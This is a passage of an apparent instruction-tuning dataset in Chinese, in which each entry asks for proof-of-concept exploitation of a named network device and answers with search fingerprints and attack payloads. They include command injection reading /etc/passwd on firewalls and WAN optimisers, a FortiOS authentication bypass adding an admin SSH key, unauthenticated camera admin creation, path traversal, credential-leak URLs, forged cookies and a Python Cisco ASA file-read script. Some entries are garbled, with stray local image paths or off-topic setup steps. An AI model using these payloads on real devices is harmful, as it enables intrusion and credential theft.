/tmp/mmap_watch_pause\\\"\");\n\texec($BASH.\"\\\"rm -rf /dev/shm/upload\\\"\");\n}\nif (isset($_GET['cmd']) && isset($_GET['name'])) {\n\t$cmd = $_GET['cmd'];\n\tif ($cmd == 'delete') {\n\t\t$name = $_GET['name'];\n\t\texec($BASH.\"\\\"rm -f \".$PREFIX.\"pkgs/\".$name.\"\\\"\");\n\t\tif (is_windows())\n\t\t\texec($BASH.\"\\\"rm -rf \".$PREFIX2.\"pkgs/\".$name.\"\\\"\");\n\t}\n}\nprint_html_begin('module');\necho \"<body>\\n\";\necho \"<table style=\\\"width:500px\\\"  border='0' align='center' cellpadding='3' cellspacing='1'>\\n\";\necho \"<th colspan=2>\".lang_get('modules').\"</th>\\n\";\necho \"<tr><td>\".lang_get('name').\"</td><td>\".lang_get('operation').\"</td></tr>\\n\";\nif (is_windows())\n\t$dh = opendir('z:\\\\writable\\\\pkgs');\nelse\n\t$dh = opendir('/config/pkgs');\nif ($dh) {\n\twhile ($file = readdir($dh)) {\n\t\tif (is_dir($file))\n\t\t\tcontinue;\n\t\t$file = trim($file);\n\t\tif (!ereg('\\.pkg$', $file))\n\t\t\tcontinue;\n\t\t$filetitle = basename($file, '.pkg');\n\t\techo \"<tr><td align=center>\".$filetitle.\"</td><td>\";\n\t\tif (user_is_admin())\n\t\t\techo \"<a href=\\\"/module.php?cmd=delete&name=\".$filetitle.\".pkg\\\">\".lang_get('delete').\"</a>\";\n\t\techo \"</td></tr>\\n\";\n\t}\n}\necho \"</table>\\n<br>\\n\";\necho \"<table style=\\\"width:500px\\\"  border='0' align='center' cellpadding='3' cellspacing='1'>\\n\";\necho \"<form action=\\\"\".$_server['php_self'].\"\\\" method=\\\"post\\\" enctype=\\\"multipart/form-data\\\">\\n\";\necho \"<input type=\\\"hidden\\\" name=\\\"max_file_size\\\" value=\\\"200000000\\\">\\n\";\necho \"<th align=\\\"center\\\" colspan=\\\"2\\\">\".lang_get('modules to upload').\"</th>\";\necho \"<tr> <td align=\\\"right\\\" width=\\\"50%\\\">\" .lang_get('select file').\"</td><td align=\\\"left\\\"> <input type=\\\"file\\\" name=\\\"fileupload\\\"> </td></tr>\";\necho \"<tr> <td align=\\\"center\\\" colspan=\\\"2\\\">  <input type=\\\"submit\\\" name=\\\"submit\\\" value=\".lang_get('upload').\"> </td></tr>\";\necho \"</form>\\n</table>\\n\";\necho \"</body>\\n\";\nprint_html_end();\n?>\n3. if (isset($_GET['cmd']) && isset($_GET['name'])) {\n\t$cmd = $_GET['cmd'];\n\tif ($cmd == 'delete') {\n\t\t$name = $_GET['name'];\n\t\texec($BASH.\"\\\"rm -f \".$PREFIX.\"pkgs/\".$name.\"\\\"\");\n\t\tif (is_windows())\n\t\t\texec($BASH.\"\\\"rm -rf \".$PREFIX2.\"pkgs/\".$name.\"\\\"\");\n\t}\n}\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/Kyan 网络监控设备 module.php 远程命令执行漏洞.md"}
    302. 

  302. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:TOTOLink 多个设备 download.cgi 远程命令执行漏洞 CVE-2022-25084\n漏洞描述:TOTOLink 多个设备 download.cgi文件存在远程命令执行漏洞,攻击者通过构造特殊的请求可以获取服务器权限\n影响版本:``` TOTOLink 多个设备 ```\n网络测绘:``` \"totolink\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【CVE编号】CVE-2022-25084\n【POC利用方法】\n1. TOTOLink 多个设备\n2. #set network\nsudo brctl addbr virbr2\nsudo ifconfig virbr2 192.168.6.1/24 up\nsudo tunctl -t tap2\nsudo ifconfig tap2 192.168.6.11/24 up\nsudo brctl addif virbr2 tap2\n\nqemu-system-mipsel -M malta -kernel vmlinux-3.2.0-4-4kc-malta -hda debian_wheezy_mipsel_standard.qcow2 -append \"root=/dev/sda1\" -netdev tap,id=tapnet,ifname=tap2,script=no -device rtl8139,netdev=tapnet -nographic\n3. ifconfig eth0 192.168.6.11 up \nscp -r squashfs-root/ root@192.168.6.11:/root/    \t\nchroot ./squashfs-root/ /bin/sh\ntouch /var/run/lighttpd.pid\n./bin/lighttpd -f ./lighttp/lighttpd.conf -m ./lighttp/lib\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/TOTOLink 多个设备 download.cgi 远程命令执行漏洞 CVE-2022-25084.md"}
    303. 

  303. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:联软安界 UniSDP 软件定义边界系统 commondRetSt 命令执行漏洞\n漏洞描述:联软安界UniSDP软件定义边界系统是基于零信任的下一代VPN,该系统2021.04.28版本中TunnelGateway某接口存在安全漏洞,漏洞允许攻击者将特制请求发送到服务器并远程命令执行。\n影响版本:``` 联软安界 UniSDP 软件定义边界系统 ```\n网络测绘:``` title=\"UniSSOView\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. 联软安界 UniSDP 软件定义边界系统\n2. title=\"UniSSOView\"\n3. POST /TunnelGateway/commondRetStr\n  \nshellCmd=id\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/联软安界 UniSDP 软件定义边界系统 commondRetSt 命令执行漏洞.md"}
    304. 

  304. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:锐捷 NBR路由器 远程命令执行漏洞 CNVD-2021-09650\n漏洞描述:锐捷NBR路由器 EWEB网管系统部分接口存在命令注入,导致远程命令执行获取权限\n影响版本:``` 锐捷NBR路由器 EWEB网管系统 ```\n网络测绘:``` title=\"锐捷网络-EWEB网管系统\" icon_hash=\"-692947551\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. 锐捷NBR路由器 EWEB网管系统\n2. title=\"锐捷网络-EWEB网管系统\"\nicon_hash=\"-692947551\"\n3. <?php\n    //查询用户是否上线了\n    $userip = @$_POST['ip'];\n    $usermac = @$_POST['mac'];\n    \n    if (!$userip || !$usermac) {\n        exit;\n    }\n    /* 判断该用户是否已经放行 */\n    $cmd = '/sbin/app_auth_hook.elf -f ' . $userip;\n    $res = exec($cmd, $out, $status);\n    /* 如果已经上线成功 */\n    if (strstr($out[0], \"status:1\")) {\n        echo 'true';\n    }\n?>\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/锐捷 NBR路由器 远程命令执行漏洞 CNVD-2021-09650.md"}
    305. 

  305. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:网康 NS-ASG安全网关 cert_download.php 任意文件读取漏洞\n漏洞描述:网康 NS-ASG安全网关 cert_download.php 文件存在任意文件读取漏洞\n影响版本:``` 网康 NS-ASG安全网关 ```\n网络测绘:``` 网康 NS-ASG安全网关 ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. 网康 NS-ASG安全网关\n2. 网康 NS-ASG安全网关\n3. ![2](C:\\Users\\47236\\Desktop\\2.png)<?php\n$filename = substr($file,strpos('certs/',$certfile)+6);\n//文件的类型\nheader('Content-type: application/pdf');\n//下载显示的名字\nheader('Content-Disposition: attachment; filename=\"'.$filename.'\"');\nreadfile(\"$certfile\");\nexit();\n?>\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/网康 NS-ASG安全网关 cert_download.php 任意文件读取漏洞.md"}
    306. 

  306. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:中国移动 禹路由 ExportSettings.sh 敏感信息泄露漏洞 CNVD-2020-67110\n漏洞描述:中国移动 禹路由 ExportSettings.sh 存在敏感信息泄露漏洞,攻击者通过漏洞获取配置文件,其中包含账号密码等敏感信息\n影响版本:``` 中国移动 禹路由 ```\n网络测绘:``` title=\"互联世界 物联未来-登录\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. title=\"互联世界 物联未来-登录\"\n2. /cgi-bin/ExportSettings.sh\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/中国移动 禹路由 ExportSettings.sh 敏感信息泄露漏洞 CNVD-2020-67110.md"}
    307. 

  307. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:华夏创新 LotWan广域网优化系统 static_arp.php 远程命令执行漏洞\n漏洞描述:华夏创新 LotWan广域网优化系统 static_arp.php文件参数 ethName存在命令拼接,导致远程命令执行漏洞\n影响版本:``` 华夏创新 LotWan广域网优化系统 ```\n网络测绘:``` title=\"LotWan 广域网优化系统\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. 华夏创新 LotWan广域网优化系统\n2. title=\"LotWan 广域网优化系统\"\n3. /acc/bindipmac/static_arp.php?ethName=||id>cmd.txt||\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/华夏创新 LotWan广域网优化系统 static_arp.php 远程命令执行漏洞.md"}
    308. 

  308. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:锐捷 Smartweb管理系统 密码信息泄露漏洞 CNVD-2021-17369\n漏洞描述:锐捷网络股份有限公司无线smartweb管理系统存在逻辑缺陷漏洞,攻击者可从漏洞获取到管理员账号密码,从而以管理员权限登录。\n影响版本:``` 锐捷网络股份有限公司 无线smartweb管理系统 ```\n网络测绘:``` title=\"无线smartWeb--登录页面\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. 锐捷网络股份有限公司 无线smartweb管理系统\n2. title=\"无线smartWeb--登录页面\"\n3. http://xxx.xxx.xxx.xxx/web/xml/webuser-auth.xml\n\nCookie添加\nCookie: login=1; oid=1.3.6.1.4.1.4881.1.1.10.1.3; type=WS5302; auth=Z3Vlc3Q6Z3Vlc3Q%3D; user=guest\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/锐捷 Smartweb管理系统 密码信息泄露漏洞 CNVD-2021-17369.md"}
    309. 

  309. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:碧海威 L7多款产品 后台命令执行漏洞\n漏洞描述:碧海威 L7多款产品存在 后台命令执行漏洞,攻击者通过账号密码登录后台后,通过命令拼接造成命令注入。\n影响版本:``` 碧海威 L7多款产品 ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. help&cat /etc/passwd\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/碧海威 L7多款产品 后台命令执行漏洞.md"}
    310. 

  310. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Panabit Panalog sy_addmount.php 远程命令执行漏洞\n漏洞描述:Panabit Panalog sy_addmount.php过滤不足,导致远程命令执行漏洞\n影响版本:``` Panabit Panalog ```\n网络测绘:``` body=\"Maintain/cloud_index.php\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. Panabit Panalog\n2. body=\"Maintain/cloud_index.php\"\n3. <?php\n\ninclude(dirname(__FILE__).\"/../common.php\");\n\n$username = isset($_REQUEST[\"username\"]) ? $_REQUEST[\"username\"] : \"\";\nif (empty($username)) {\n\techo '{\"success\":\"no\", \"out\":\"NO_USER\"}';\n\texit;\n}\n\n$username = addslashes($username);\n\n$rows = array();\n\n$cmd = PANALOGEYE.\" behavior add account=$username\";\nexec($cmd, $out, $ret);\necho $out[0];\nexit;\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/Panabit Panalog sy_addmount.php 远程命令执行漏洞.md"}
    311. 

  311. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:朗视 TG400 GSM 网关目录遍历 CVE-2021-27328\n漏洞描述:朗视 TG400 GSM 网关存在目录遍历 ,攻击者可以通过漏洞获取敏感信息\n影响版本:``` 朗视 TG400 GSM 网关 ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【CVE编号】CVE-2021-27328\n【POC利用方法】\n1. 朗视 TG400 GSM 网关\n2. 获取固件解密密码\nhttp://192.168.43.246/cgi/WebCGI?1404=../../../../../../../../../../bin/firmware_detect\n/etc/passwd:\nhttp://192.168.43.246/cgi/WebCGI?1404=../../../../../../../../../../etc/passwd\n3. http://192.168.43.246/cgi/WebCGI?1404=../../../../../../../../../../bin/firmware_detect\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/朗视 TG400 GSM 网关目录遍历 CVE-2021-27328.md"}
    312. 

  312. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Fortinet FortiOS admin 远程命令执行漏洞 CVE-2022-40684\n漏洞描述:Fortinet 周一指出,上周修补的 CVE-2022-40684 身份验证绕过安全漏洞,正在野外被广泛利用。作为管理界面上的一个身份验证绕过漏洞,远程威胁参与者可利用其登录 FortiGate 防火墙、FortiProxy Web 代理、以及 FortiSwitch Manager(FSWM)本地管理实例\n影响版本:``` FortiOS <= 7.2.1、7.2.0、7.0.6、7.0.5、7.0.4、7.0.3、7.0.2、7.0.1、7.0.0 FortiProxy <= 7.2.0、7.0.6、7.0.5、7.0.4、7.0.3、7.0.2、7.0.1、7.0.0 FortiSwitchManager <= 7.2.0、7.0.0 ```\n网络测绘:``` title=\"FortiProxy\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【CVE编号】CVE-2022-40684\n【POC利用方法】\n1. FortiOS <= 7.2.1、7.2.0、7.0.6、7.0.5、7.0.4、7.0.3、7.0.2、7.0.1、7.0.0\nFortiProxy <= 7.2.0、7.0.6、7.0.5、7.0.4、7.0.3、7.0.2、7.0.1、7.0.0\nFortiSwitchManager <= 7.2.0、7.0.0\n2. title=\"FortiProxy\"\n3. PUT /api/v2/cmdb/system/admin/admin HTTP/1.1\nHost: \nAccept: */*\nAccept-Encoding: gzip, deflate\nContent-Length: 597\nContent-Type: application/json\nForwarded: for=\"[127.0.0.1]:8888\";by=\"[127.0.0.1]:8888\"\nUser-Agent: Report Runner\n\n{\"ssh-public-key1\": \"123\"}\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/Fortinet FortiOS admin 远程命令执行漏洞 CVE-2022-40684.md"}
    313. 

  313. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:百卓 Smart importhtml.php 远程命令执行漏洞\n漏洞描述:百卓 importhtml.php文件sql语句无过滤,通过Sql语句可远程命令执行\n影响版本:``` 百卓 Smart ```\n网络测绘:``` title=\"Smart管理平台\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. title=\"Smart管理平台\"\n2. <?php \ninclude_once(\"global.func.php\");\nif($_SESSION['language']!=\"english\")\n{\n\trequire_once (\"include/language_cn.php\");\n}\nelse \n{\n\trequire_once (\"include/language_en.php\");\n}\n\nif(isset($_GET['type'])) $get_type = $_GET['type'];\nif(isset($_GET['tab'])) $get_tab = $_GET['tab'];\nif(isset($_GET['sql'])) $get_sql = $_GET['sql'];\n\nif($get_type == \"exporthtmlpost\")\t\n{\n\t$get_tab = $arr_export_cn[$get_tab];\n\texportHtml(\"$get_tab\",stripslashes(base64_decode($get_sql)));\n}\nelseif($get_type == \"exporthtmlchat\")\t\n{\n\t$get_tab = $arr_export_cn[$get_tab];\n\texportHtmlChat(\"$get_tab\",stripslashes(base64_decode($get_sql)));\n}\nelseif($get_type == \"exporthtmlmail\")\t\n{\n\t$get_tab = $arr_export_cn[$get_tab];\n\texportHtmlMail(\"$get_tab\",stripslashes(base64_decode($get_sql)));\n}\nelseif($get_type == \"exporthtmlwebsend\")\t\n{\n\t$get_tab = $arr_export_cn[$get_tab];\n\texportHtmlWebSend(\"$get_tab\",stripslashes(base64_decode($get_sql)));\n}\nelseif($get_type == \"exporthtmlwebrecv\")\t\n{\n\t$get_tab = $arr_export_cn[$get_tab];\n\texportHtmlWebRecv(\"$get_tab\",stripslashes(base64_decode($get_sql)));\n}\n?>\n3. function exportHtmlMail($filename,$sql){\n\n\tHeader( \"Expires: 0\" );\n\n\tHeader( \"Pragma: public\" );\n\n\tHeader( \"Cache-Control: must-revalidate, post-check=0, pre-check=0\" );\n\n\tHeader( \"Cache-Control: public\");\n\n\tHeader( \"Content-Type: application/octet-stream\" );\n\n\theader(\"Accept-Ranges: bytes\");\n\n\theader(\"Content-Disposition: attachment; filename=$filename.html\");\n\n\techo \"<html>\\n\";\n\n\techo \"<head><title>报表</title></head>\\n\";\n\n\techo \"<body>\\n\";\n\n\t$conn = connOther();\n\n\t$result = mysql_query($sql,$conn);\n\n\twhile ($data= mysql_fetch_array($result)){\n\n\t\t$post_content = \"\";\n\n\t\tif($data['mail_file_path'] == \"(null)\"){\n\n\t\t\t$post_content = \"<font color=red>内容审计未启用</font>\";\n\n\t\t}\n\n\t\telse{\n\n\n\n\t\t\t$post_filename=$data['mail_file_path'];\n\n\t\t\t$ifother = \"\";\n\n\t\t\t$ifother = ifExistOther($post_filename);\n\n\t\t\tif($ifother!=\"\"){\n\n\t\t\t\t$post_filename = $ifother;\n\n\t\t\t}\n\n\t\t\t$str = \"/usr/bin/cap2con $post_filename pop\";\n\n\t\t\tsystem($str,$returnvalue);\n\n\t\t\t$post_filename=str_replace(\".cap\",\".eml\",$post_filename);\n\n\t\t\t$post_content = file_get_contents($post_filename);\n\n\t\t\t$rec=new mime_decode;\n\n\t\t\t$post_content=$rec->decode_mime_string($post_content);\n\n\t\t\t//...\n\n\t\t}\n\n\t}\n\n}\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/百卓 Smart importhtml.php 远程命令执行漏洞.md"}
    314. 

  314. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Cisco ASA设备 任意文件读取漏洞 CVE-2020-3452\n漏洞描述:Cisco Adaptive Security Appliance (ASA) 防火墙设备以及Cisco Firepower Threat Defense (FTD)设备的WEB管理界面存在未授权的目录穿越漏洞和远程任意文件读取漏洞,允许未经身份验证的远程攻击者进行目录遍历攻击并读取目标系统上的敏感文件,此漏洞不能用于获取对ASA或FTD系统文件或底层操作系统(OS)文件的访问,所以只能读取web系统目录的文件,比如webvpn的配置文件、书签、网络cookies、部分网络内容和超文本传输协议网址等信息。\n影响版本:- Cisco ASA设备: ![](./images/202202162120091.png) - Cisco FTD设备: ![](./images/202202162120403.png)\n网络测绘:``` /+CSCOE+/ Cisco-ASA ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【CVE编号】CVE-2020-3452\n【POC利用方法】\n1. /+CSCOE+/\nCisco-ASA\n2. https://xxx.xxx.xxx.xxx/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../\n3. #!/usr/bin/python3\n#-*- coding:utf-8 -*-\n# author : PeiQi\n# from   : http://wiki.peiqi.tech\n\nimport requests\nimport base64\nimport sys\nimport urllib3\n\ndef title():\n    print('+------------------------------------------')\n    print('+  \\033[34mPOC_Des: http://wiki.peiqi.tech                                   \\033[0m')\n    print('+  \\033[34mGithub : https://github.com/PeiQi0                                 \\033[0m')\n    print('+  \\033[34m公众号 : PeiQi文库                                                     \\033[0m')\n    print('+  \\033[34mVersion: Cisco                                                    \\033[0m')\n    print('+  \\033[36m使用格式: python3 CVE-2020-1956                                    \\033[0m')\n    print('+  \\033[36mUrl    >>> http://xxx.xxx.xxx.xxx                                 \\033[0m')\n    print('+------------------------------------------')\n\ndef POC_1(target_url):\n    vnln_url = target_url + \"/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../\"\n    headers = {\n        \"User-Agent\" : \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36\"\n    }\n\n    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n    response = requests.get(url=vnln_url, headers=headers, verify=False ,timeout=20)\n    if \"Bad Request\" in response.text:\n            print(\"\\033[31m[x] 漏洞已修复 \\033[0m\")\n    else:\n            print(\"\\033[32m[o] 存在漏洞,响应为\\n\\033[0m\",response.text)\n\n\n\nif __name__ == '__main__':\n    title()\n    target_url = str(input(\"\\033[35mPlease input Attack Url\\nUrl >>> \\033[0m\"))\n    POC_1(target_url)\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/Cisco ASA设备 任意文件读取漏洞 CVE-2020-3452.md"}
    315. 

  315. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:大华 智慧园区综合管理平台 user_getUserInfoByUserName.action 账号密码泄漏漏洞\n漏洞描述:大华 智慧园区综合管理平台 user_getUserInfoByUserName.action 中存在API接口,导致管理园账号密码泄漏\n影响版本:智慧园区综合管理平台\n网络测绘:``` app=\"dahua-智慧园区综合管理平台\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. app=\"dahua-智慧园区综合管理平台\"\n2. /admin/user_getUserInfoByUserName.action?userName=system\n3. /admin/login_login.action\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/大华 智慧园区综合管理平台 user_getUserInfoByUserName.action 账号密码泄漏漏洞.md"}
    316. 

  316. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:奇安信网康 下一代防火墙 router 远程命令执行漏洞\n漏洞描述:奇安信 网康下一代防火墙存在远程命令执行,通过漏洞攻击者可以获取服务器权限\n影响版本:``` 奇安信 网康下一代防火墙 ```\n网络测绘:``` app=\"网康科技-下一代防火墙\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. 奇安信 网康下一代防火墙\n2. app=\"网康科技-下一代防火墙\"\n3. ![2](C:\\Users\\47236\\Desktop\\2.png)POST /directdata/direct/router HTTP/1.1\nHost: XXX.XXX.XXX.XXX\nConnection: close\nContent-Length: 179\nCache-Control: max-age=0\nsec-ch-ua: \"Google Chrome\";v=\"89\", \"Chromium\";v=\"89\", \";Not A Brand\";v=\"99\"\nsec-ch-ua-mobile: ?0\nContent-Type: application/json\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\n\n{\"action\":\"SSLVPN_Resource\",\"method\":\"deleteImage\",\"data\":[{\"data\":[\"/var/www/html/d.txt;cat /etc/passwd >/var/www/html/test_cmd.txt\"]}],\"type\":\"rpc\",\"tid\":17,\"f8839p7rqtj\":\"=\"}\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/奇安信 网康 下一代防火墙 router 远程命令执行漏洞.md"}
    317. 

  317. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Finetree 5MP 摄像机 user_pop.php 任意用户添加漏洞 CNVD-2021-42372\n漏洞描述:Finetree 5MP 摄像机 user_pop.php文件存在未授权任意用户添加,攻击者添加后可以获取后台权限\n影响版本:``` Finetree 5MP Finetree 3MP ```\n网络测绘:``` app=\"Finetree-5MP-Network-Camera\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. Finetree 5MP\nFinetree 3MP\n2. app=\"Finetree-5MP-Network-Camera\"\n3. POST /quicksetup/user_update.php HTTP/1.1\nHost: \nAccept: */*\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6\nContent-Length: 58\nContent-Type: application/x-www-form-urlencoded\nCookie: PHPSESSID=fn4qnpv5c8a2jgvf53vs1gufm6\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36\n\nmethod=add&user=admin1234&pwd=admin1234&group=2&ptz_enable=0\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/Finetree 5MP 摄像机 user_pop.php 任意用户添加漏洞 CNVD-2021-42372.md"}
    318. 

  318. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:锐捷 校园网自助服务系统 login_judge.jsf 任意文件读取漏洞\n漏洞描述:锐捷 校园网自助服务系统 login_judge.jsf 接口存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器中的敏感文件\n影响版本:锐捷 校园网自助服务系统\n网络测绘:``` body=\"校园网自助服务系统\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. body=\"校园网自助服务系统\"\n2. /selfservice/selfservice/module/scgroup/web/login_judge.jsf?view=./WEB-INF/web.xml%3F\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/锐捷 校园网自助服务系统 login_judge.jsf 任意文件读取漏洞.md"}
    319. 

  319. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:HIKVISION 流媒体管理服务器 user.xml 账号密码泄漏漏洞\n漏洞描述:HIKVISION 流媒体管理服务器配置文件未做鉴权,攻击者通过漏洞可以获取网站账号密码\n影响版本:``` HIKVISION 流媒体管理服务器 ```\n网络测绘:``` \"杭州海康威视系统技术有限公司 版权所有\" && title=\"流媒体管理服务器\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. HIKVISION 流媒体管理服务器\n2. \"杭州海康威视系统技术有限公司 版权所有\" && title=\"流媒体管理服务器\"\n3. /config/user.xml\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/HIKVISION 流媒体管理服务器 user.xml 账号密码泄漏漏洞.md"}
    320. 

  320. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:飞鱼星 企业级智能上网行为管理系统 权限绕过信息泄露漏洞\n漏洞描述:飞鱼星 企业级智能上网行为管理系统 存在权限绕过以及信息泄露漏洞,可以获取管理员权限以及用户密码\n影响版本:``` 飞鱼星 企业级智能上网行为管理系统 ```\n网络测绘:``` title=\"飞鱼星企业级智能上网行为管理系统\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. 飞鱼星 企业级智能上网行为管理系统\n2. title=\"飞鱼星企业级智能上网行为管理系统\"\n3. /request_para.cgi?parameter=wifi_info \t\t #获取ALL WIFI账号密码\n/request_para.cgi?parameter=wifi_get_5g_host #获取5GWIFI账号密码\n/request_para.cgi?parameter=wifi_get_2g_host #获取2GWIFI账号密码\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/飞鱼星 企业级智能上网行为管理系统 权限绕过信息泄露漏洞.md"}
    321. 

  321. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:思福迪堡垒机 任意用户登录漏洞\n漏洞描述:思福迪堡垒机存在任意⽤户登录漏洞,恶意攻击者可以绕过堡垒机的密码登录验证机制,以任 意⽤户身份随意登录堡垒机Web管理界⾯,并可以正常的使⽤账户权限去操作。\n影响版本:``` 思福迪堡垒机 ```\n网络测绘:``` \"Logbase运维安全管理系统\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【POC利用方法】\n1. \"Logbase运维安全管理系统\"\n2. POST /bhost/set_session HTTP/1.1\nHost: xxx.xxx.xxx.xx\nu1=admin&m1=\n3. POST /bhost/login_link HTTP/1.1\nHost: xxx.xxx.xxx.xxx\na0=1562205376847&a1=&a10=2019-01-\n01+10:10:10&ha=CADFDF26E649FB6284D2FD424BD294B6&uCode=admin&vdcode=\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/思福迪堡垒机 任意用户登录漏洞.md"}
    322. 

  322. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:D-Link DSL-28881A FTP配置错误 CVE-2020-24578\n漏洞描述:D-Link DSL-2888A路由器具有文件共享功能,该功能允许用户通过将外部驱动器插入路由器来与其他网络用户共享文件。然后通过FTP(文件传输协议)共享。但是,FTP服务允许网络用户转义共享文件夹以访问路由器文件系统并下载位于根文件夹中的其他文件。\n影响版本:``` D-Link DSL-2888A ```\n网络测绘:``` body=\"DSL-2888A\" ```\n", "input": "", "output": "【漏洞类型】network_device_vulnerability\n【CVE编号】CVE-2020-24578\n【POC利用方法】\n1. D-Link DSL-2888A\n2. body=\"DSL-2888A\"\n3. ftp xxx.xxx.xxx.xxx\nftp> cd etc \nftp> get passwd\n", "category": "poc_network_device_vulnerability", "source": "awesome_poc_dataset", "file_path": "网络设备漏洞/D-Link DSL-28881A FTP配置错误 CVE-2020-24578.md"}
    323. 

